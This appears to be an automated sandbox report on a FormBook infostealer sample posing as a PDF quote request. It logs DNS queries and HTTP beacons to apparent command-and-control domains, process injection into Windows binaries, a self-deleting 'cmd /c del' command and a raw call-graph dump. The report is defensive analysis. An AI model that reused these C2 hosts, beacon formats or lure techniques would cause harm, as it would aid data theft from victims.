Jan 13, 2025 13:08:45.326337099 CET | 192.168.2.6 | 1.1.1.1 | 0x5b52 | Standard query (0) | www.health-insurance-cake.world | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:09:26.270142078 CET | 192.168.2.6 | 1.1.1.1 | 0xc897 | Standard query (0) | www.86339.xyz | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:09:27.263577938 CET | 192.168.2.6 | 1.1.1.1 | 0xc897 | Standard query (0) | www.86339.xyz | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:09:48.529829025 CET | 192.168.2.6 | 1.1.1.1 | 0x948 | Standard query (0) | www.d66dr114gl.bond | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 13, 2025 13:06:02.161725998 CET | 1.1.1.1 | 192.168.2.6 | 0x33d2 | No error (0) | www.simo1simo001.click | | 164.92.166.75 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:06:22.297101021 CET | 1.1.1.1 | 192.168.2.6 | 0xf947 | No error (0) | www.ilsgroup.net | ilsgroup.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 13, 2025 13:06:22.297101021 CET | 1.1.1.1 | 192.168.2.6 | 0xf947 | No error (0) | ilsgroup.net | | 172.104.236.215 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:06:42.011888027 CET | 1.1.1.1 | 192.168.2.6 | 0x4c92 | No error (0) | www.7b5846.online | | 104.21.40.196 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:06:42.011888027 CET | 1.1.1.1 | 192.168.2.6 | 0x4c92 | No error (0) | www.7b5846.online | | 172.67.188.70 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:07:02.762029886 CET | 1.1.1.1 | 192.168.2.6 | 0xfa5a | Name error (3) | www.91uvq.pro | none | none | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:07:23.609267950 CET | 1.1.1.1 | 192.168.2.6 | 0xcdeb | No error (0) | www.maheshg.xyz | maheshg.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Jan 13, 2025 13:07:23.609267950 CET | 1.1.1.1 | 192.168.2.6 | 0xcdeb | No error (0) | maheshg.xyz | | 217.21.91.24 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:07:44.041654110 CET | 1.1.1.1 | 192.168.2.6 | 0xf464 | Name error (3) | www.hair-transplantation-65829.bond | none | none | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:08:04.497265100 CET | 1.1.1.1 | 192.168.2.6 | 0xf942 | No error (0) | www.gequiltdesins.shop | | 104.21.80.156 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:08:04.497265100 CET | 1.1.1.1 | 192.168.2.6 | 0xf942 | No error (0) | www.gequiltdesins.shop | | 172.67.151.88 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:08:24.930558920 CET | 1.1.1.1 | 192.168.2.6 | 0x8e5 | Name error (3) | www.backstretch.store | none | none | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:08:45.591274023 CET | 1.1.1.1 | 192.168.2.6 | 0x5b52 | No error (0) | www.health-insurance-cake.world | ssl1.prod.systemdragon.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 13, 2025 13:08:45.591274023 CET | 1.1.1.1 | 192.168.2.6 | 0x5b52 | No error (0) | ssl1.prod.systemdragon.com | | 104.18.188.223 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:08:45.591274023 CET | 1.1.1.1 | 192.168.2.6 | 0x5b52 | No error (0) | ssl1.prod.systemdragon.com | | 104.18.187.223 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:09:27.611310005 CET | 1.1.1.1 | 192.168.2.6 | 0xc897 | No error (0) | www.86339.xyz | huayang.302.gn301.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Jan 13, 2025 13:09:27.611310005 CET | 1.1.1.1 | 192.168.2.6 | 0xc897 | No error (0) | huayang.302.gn301.xyz | | 23.225.71.166 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:09:27.611310005 CET | 1.1.1.1 | 192.168.2.6 | 0xc897 | No error (0) | huayang.302.gn301.xyz | | 23.225.71.183 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:09:27.611670017 CET | 1.1.1.1 | 192.168.2.6 | 0xc897 | No error (0) | www.86339.xyz | huayang.302.gn301.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Jan 13, 2025 13:09:27.611670017 CET | 1.1.1.1 | 192.168.2.6 | 0xc897 | No error (0) | huayang.302.gn301.xyz | | 23.225.71.166 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:09:27.611670017 CET | 1.1.1.1 | 192.168.2.6 | 0xc897 | No error (0) | huayang.302.gn301.xyz | | 23.225.71.183 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:09:48.909723043 CET | 1.1.1.1 | 192.168.2.6 | 0x948 | Name error (3) | www.d66dr114gl.bond | none | none | A (IP address) | IN (0x0001) | false
                                                                                                              • www.simo1simo001.click
                                                                                                              • www.ilsgroup.net
                                                                                                              • www.7b5846.online
                                                                                                              • www.maheshg.xyz
                                                                                                              • www.gequiltdesins.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49738 | 164.92.166.75 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:06:02.169464111 CET | 173 | OUT | GET /hwu6/?CXFd8=VqwCA0fDirS9FNcK+XWY5HArCimG0sfrxcJclabbIM4+tzWzOeCWxbUPg8n3aCtVsQmTH2yodQ==&Ez=ltxdQ8m HTTP/1.1
                                                                                                              Host: www.simo1simo001.click
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49751 | 172.104.236.215 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:06:22.302968979 CET | 167 | OUT | GET /hwu6/?CXFd8=mpYjKcP0TN+fbEitUHIdgmI2VRYct5ttq2KUkf3p2L9OArgqjWS4GwM5LnRr9sxMQhRrBRaxzw==&Ez=ltxdQ8m HTTP/1.1
                                                                                                              Host: www.ilsgroup.net
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49752 | 104.21.40.196 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:06:42.017618895 CET | 168 | OUT | GET /hwu6/?CXFd8=YeF1y3E0QpZaaHwaKvJk7b1+zf3Y35LdyPqCzn7ElcW/f++Fd6XCLGgtd2HkwQuXQqI9c12LSg==&Ez=ltxdQ8m HTTP/1.1
                                                                                                              Host: www.7b5846.online
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
Jan 13, 2025 13:06:42.497585058 CET | 784 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                              Date: Mon, 13 Jan 2025 12:06:42 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 167
                                                                                                              Connection: close
                                                                                                              Cache-Control: max-age=3600
                                                                                                              Expires: Mon, 13 Jan 2025 13:06:42 GMT
                                                                                                              Location: https://7b5846.live
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mtAKPSn4P5MkZLJ1J9dGJz1qLntX7hpBkuzr%2BHnl6GmcsOUbn4e4KdZ2xsTIbMgWvvzzfExPrHVEVShmkowcCfYpFwia81Qx37NIXT2F%2FDuAcEM7oMCZQ1MMILsoJxXO9WV%2Biw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90154303398c42ec-EWR
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49753 | 217.21.91.24 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:07:23.615294933 CET | 166 | OUT | GET /hwu6/?CXFd8=FXfZ1xOYYW9swHejpVIfMDCztZ/FrnQZeJUgNQ4rzoTHCxvijkBbGX2//Z/tWIGDAo4gMXnXlg==&Ez=ltxdQ8m HTTP/1.1
                                                                                                              Host: www.maheshg.xyz
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:


Session ID: 4
Source IP: 192.168.2.6
Source Port: 49755
Destination IP: 104.21.80.156
Destination Port: 80
PID: 4004
Process: C:\Windows\explorer.exe
Timestamp: Jan 13, 2025 13:08:04.503456116 CET
Bytes transferred: 173
Direction: OUT
Data:
GET /hwu6/?CXFd8=+zwICv/sB1e6MtWwpRel8f5Q0bYKICZzsoJO8W/+cdiLpY7N+AEBhZIv3jjSTSPlRhhnl/FLAA==&Ez=ltxdQ8m HTTP/1.1
                                                                                                              Host: www.gequiltdesins.shop
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:



                                                                                                              Target ID:0
                                                                                                              Start time:07:05:22
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe"
                                                                                                              Imagebase:0xa40000
                                                                                                              File size:1'790'464 bytes
                                                                                                              MD5 hash:F1CB41BE3365B899A74D919DF902FC08
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:07:05:23
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe"
                                                                                                              Imagebase:0x980000
                                                                                                              File size:46'504 bytes
                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:3
                                                                                                              Start time:07:05:24
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                              Imagebase:0x7ff609140000
                                                                                                              File size:5'141'208 bytes
                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.4776081741.0000000008811000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:4
                                                                                                              Start time:07:05:27
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\autoconv.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\SysWOW64\autoconv.exe"
                                                                                                              Imagebase:0x180000
                                                                                                              File size:842'752 bytes
                                                                                                              MD5 hash:A705C2ACED7DDB71AFB87C4ED384BED6
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              Target ID:5
                                                                                                              Start time:07:05:27
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\help.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\SysWOW64\help.exe"
                                                                                                              Imagebase:0x870000
                                                                                                              File size:10'240 bytes
                                                                                                              MD5 hash:DD40774E56D4C44B81F2DFA059285E75
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:moderate
                                                                                                              Has exited:false

                                                                                                              Target ID:6
                                                                                                              Start time:07:05:30
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                                                                                              Imagebase:0x1c0000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:07:05:30
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:2.7%
                                                                                                                Dynamic/Decrypted Code Coverage:1.1%
                                                                                                                Signature Coverage:3.3%
                                                                                                                Total number of Nodes:1594
                                                                                                                Total number of Limit Nodes:49
a786ae 96224->96282 96227 a800f8 96225->96227 96228 a808fc CloseHandle 96225->96228 96238 a80121 LeaveCriticalSection __wsopen_s 96227->96238 96297 a8039a CreateFileW 96228->96297 96230 a80927 96231 a80931 GetLastError 96230->96231 96232 a8095d 96230->96232 96298 a6f2a3 20 API calls 2 library calls 96231->96298 96232->96227 96234 a8093d 96299 a75333 21 API calls 3 library calls 96234->96299 96236->96183 96237->96188 96238->96188 96240 a80450 96239->96240 96245 a8046a 96239->96245 96240->96245 96307 a6f2d9 20 API calls __dosmaperr 96240->96307 96243 a8045f 96308 a727ec 26 API calls ___std_exception_copy 96243->96308 96300 a803bf 96245->96300 96246 a804d1 96254 a80524 96246->96254 96311 a6d70d 26 API calls 2 library calls 96246->96311 96247 a804a2 96247->96246 96309 a6f2d9 20 API calls __dosmaperr 96247->96309 96250 a8051f 96252 a8059e 96250->96252 96250->96254 96251 a804c6 96310 a727ec 26 API calls ___std_exception_copy 96251->96310 96312 a727fc 11 API calls _abort 96252->96312 96254->96192 96254->96193 96256 a805aa 96258 a7522d ___DestructExceptionObject 96257->96258 96315 a72f5e EnterCriticalSection 96258->96315 96260 a7527b 96316 a7532a 96260->96316 96261 a75234 96261->96260 96262 a75259 96261->96262 96267 a752c7 EnterCriticalSection 96261->96267 96319 a75000 21 API calls 3 library calls 96262->96319 96265 a752a4 __wsopen_s 96265->96196 96266 a7525e 96266->96260 96320 a75147 EnterCriticalSection 96266->96320 96267->96260 96268 a752d4 LeaveCriticalSection 96267->96268 96268->96261 96270->96208 96271->96212 96272->96227 96273->96202 96274->96212 96275->96216 96276->96212 96277->96213 96278->96219 96279->96218 96280->96220 96281->96223 96322 a753c4 96282->96322 96284 a786c4 96335 a75333 21 API calls 3 library calls 96284->96335 96286 a786be 96286->96284 96287 a786f6 96286->96287 96290 a753c4 __wsopen_s 26 API calls 96286->96290 96287->96284 96288 a753c4 __wsopen_s 26 API calls 96287->96288 96292 a78702 CloseHandle 96288->96292 96289 a7871c 96293 a7873e 96289->96293 
96336 a6f2a3 20 API calls 2 library calls 96289->96336 96291 a786ed 96290->96291 96294 a753c4 __wsopen_s 26 API calls 96291->96294 96292->96284 96295 a7870e GetLastError 96292->96295 96293->96227 96294->96287 96295->96284 96297->96230 96298->96234 96299->96232 96303 a803d7 96300->96303 96301 a803f2 96301->96247 96303->96301 96313 a6f2d9 20 API calls __dosmaperr 96303->96313 96304 a80416 96314 a727ec 26 API calls ___std_exception_copy 96304->96314 96306 a80421 96306->96247 96307->96243 96308->96245 96309->96251 96310->96246 96311->96250 96312->96256 96313->96304 96314->96306 96315->96261 96321 a72fa6 LeaveCriticalSection 96316->96321 96318 a75331 96318->96265 96319->96266 96320->96260 96321->96318 96323 a753e6 96322->96323 96324 a753d1 96322->96324 96329 a7540b 96323->96329 96339 a6f2c6 20 API calls __dosmaperr 96323->96339 96337 a6f2c6 20 API calls __dosmaperr 96324->96337 96326 a753d6 96338 a6f2d9 20 API calls __dosmaperr 96326->96338 96329->96286 96330 a75416 96340 a6f2d9 20 API calls __dosmaperr 96330->96340 96331 a753de 96331->96286 96333 a7541e 96341 a727ec 26 API calls ___std_exception_copy 96333->96341 96335->96289 96336->96293 96337->96326 96338->96331 96339->96330 96340->96333 96341->96331 96342 a42de3 96343 a42df0 __wsopen_s 96342->96343 96344 a82c2b ___scrt_fastfail 96343->96344 96345 a42e09 96343->96345 96347 a82c47 GetOpenFileNameW 96344->96347 96358 a43aa2 96345->96358 96349 a82c96 96347->96349 96351 a46b57 22 API calls 96349->96351 96353 a82cab 96351->96353 96353->96353 96355 a42e27 96386 a444a8 96355->96386 96416 a81f50 96358->96416 96361 a43ace 96363 a46b57 22 API calls 96361->96363 96362 a43ae9 96422 a4a6c3 96362->96422 96365 a43ada 96363->96365 96418 a437a0 96365->96418 96368 a42da5 96369 a81f50 __wsopen_s 96368->96369 96370 a42db2 GetLongPathNameW 96369->96370 96371 a46b57 22 API calls 96370->96371 96372 a42dda 96371->96372 96373 a43598 96372->96373 96374 a4a961 22 API calls 96373->96374 96375 a435aa 96374->96375 96376 a43aa2 23 API calls 
96375->96376 96377 a435b5 96376->96377 96378 a832eb 96377->96378 96379 a435c0 96377->96379 96384 a8330d 96378->96384 96440 a5ce60 41 API calls 96378->96440 96428 a4515f 96379->96428 96385 a435df 96385->96355 96441 a44ecb 96386->96441 96389 a83833 96463 ab2cf9 96389->96463 96390 a44ecb 94 API calls 96392 a444e1 96390->96392 96392->96389 96394 a444e9 96392->96394 96393 a83848 96395 a83869 96393->96395 96396 a8384c 96393->96396 96398 a444f5 96394->96398 96399 a83854 96394->96399 96397 a5fe0b 22 API calls 96395->96397 96507 a44f39 96396->96507 96408 a838ae 96397->96408 96506 a4940c 136 API calls 2 library calls 96398->96506 96513 aada5a 82 API calls 96399->96513 96403 a42e31 96404 a83862 96404->96395 96405 a83a5f 96411 a83a67 96405->96411 96406 a44f39 68 API calls 96406->96411 96408->96405 96408->96411 96413 a49cb3 22 API calls 96408->96413 96489 aa967e 96408->96489 96492 a4a4a1 96408->96492 96500 a43ff7 96408->96500 96514 aa95ad 42 API calls _wcslen 96408->96514 96515 ab0b5a 22 API calls 96408->96515 96411->96406 96516 aa989b 82 API calls __wsopen_s 96411->96516 96413->96408 96417 a43aaf GetFullPathNameW 96416->96417 96417->96361 96417->96362 96419 a437ae 96418->96419 96420 a493b2 22 API calls 96419->96420 96421 a42e12 96420->96421 96421->96368 96423 a4a6d0 96422->96423 96424 a4a6dd 96422->96424 96423->96365 96425 a5fddb 22 API calls 96424->96425 96426 a4a6e7 96425->96426 96427 a5fe0b 22 API calls 96426->96427 96427->96423 96429 a4516e 96428->96429 96433 a4518f __fread_nolock 96428->96433 96431 a5fe0b 22 API calls 96429->96431 96430 a5fddb 22 API calls 96432 a435cc 96430->96432 96431->96433 96434 a435f3 96432->96434 96433->96430 96435 a43605 96434->96435 96439 a43624 __fread_nolock 96434->96439 96437 a5fe0b 22 API calls 96435->96437 96436 a5fddb 22 API calls 96438 a4363b 96436->96438 96437->96439 96438->96385 96439->96436 96440->96378 96517 a44e90 LoadLibraryA 96441->96517 96446 a44ef6 LoadLibraryExW 96525 a44e59 LoadLibraryA 96446->96525 96447 a83ccf 96448 a44f39 68 
API calls 96447->96448 96450 a83cd6 96448->96450 96452 a44e59 3 API calls 96450->96452 96454 a83cde 96452->96454 96547 a450f5 96454->96547 96455 a44f20 96455->96454 96456 a44f2c 96455->96456 96458 a44f39 68 API calls 96456->96458 96460 a444cd 96458->96460 96460->96389 96460->96390 96462 a83d05 96464 ab2d15 96463->96464 96465 a4511f 64 API calls 96464->96465 96466 ab2d29 96465->96466 96697 ab2e66 96466->96697 96469 ab2d3f 96469->96393 96470 a450f5 40 API calls 96471 ab2d56 96470->96471 96472 a450f5 40 API calls 96471->96472 96473 ab2d66 96472->96473 96474 a450f5 40 API calls 96473->96474 96475 ab2d81 96474->96475 96476 a450f5 40 API calls 96475->96476 96477 ab2d9c 96476->96477 96478 a4511f 64 API calls 96477->96478 96479 ab2db3 96478->96479 96480 a6ea0c ___std_exception_copy 21 API calls 96479->96480 96481 ab2dba 96480->96481 96482 a6ea0c ___std_exception_copy 21 API calls 96481->96482 96483 ab2dc4 96482->96483 96484 a450f5 40 API calls 96483->96484 96485 ab2dd8 96484->96485 96486 ab28fe 27 API calls 96485->96486 96487 ab2dee 96486->96487 96487->96469 96703 ab22ce 79 API calls 96487->96703 96490 a5fe0b 22 API calls 96489->96490 96491 aa96ae __fread_nolock 96490->96491 96491->96408 96493 a4a52b 96492->96493 96499 a4a4b1 __fread_nolock 96492->96499 96495 a5fe0b 22 API calls 96493->96495 96494 a5fddb 22 API calls 96496 a4a4b8 96494->96496 96495->96499 96497 a5fddb 22 API calls 96496->96497 96498 a4a4d6 96496->96498 96497->96498 